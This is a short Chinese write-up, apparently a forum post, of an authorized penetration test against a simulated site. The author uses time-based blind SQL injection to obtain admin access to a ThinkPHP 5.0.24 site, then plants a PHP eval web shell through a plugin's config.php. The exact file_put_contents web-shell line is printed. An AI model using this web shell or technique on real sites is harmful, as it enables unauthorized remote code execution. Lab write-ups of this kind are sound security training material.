来了这么久还没投过原创,不能老翻译别人的对吧。
今天的主角是一个模拟站点,目标是拿shell,授权了。
打开网站:
总不能上来就怼登录框吧,注册一下看看。
因为目标是拿shell,所以重点看上传,读写操作,模板编辑等,其他洞比如注入一般就不看了。
像注入然后写shell或者udf这些,因为这类站大部分是bt一键搭的,配置基本不会给机会。
没啥说法,个人中心,看看有没有头像上传。
没有机会。
看了看url觉得眼熟:
好吧,报错页面改过。
url加admin跳转。
有时间盲注,爆密码然后解密上去,这块差点熬傻了,还好最后有结果。
所以说搞站还是要有耐心。
余额还挺多,看了一圈之后,上传点应该是写死了。
有个执行命令的地方,没搞明白怎么玩的。
两处有机会的点,数据库管理以及文件管理,然而这块功能应该是删了,爆出来是tp5.0.24,这版本反序列化传说有人无源码写shell了,这块就没试。
现在剩下一个插件管理,可以上传并加载,尝试把shell写到插件里,然而找了半天没找到写完后的目录。
后想起来应该会读取插件里面的config.php,写config.php里面包含应该就可以了。
然而写半天连不上,访问也404,怀疑插件目录不在web根目录下,查看下当前目录。
好了,这下就对了,直接写到public下就行。
file_put_contents("../public/test.php","<?php @eval(\$_POST['test']);echo 'hello';");
搞定。
第一次投稿,菜鸟只能打打靶场了,希望各位大佬多多指点。
本文迁移自知识星球“火线Zone”
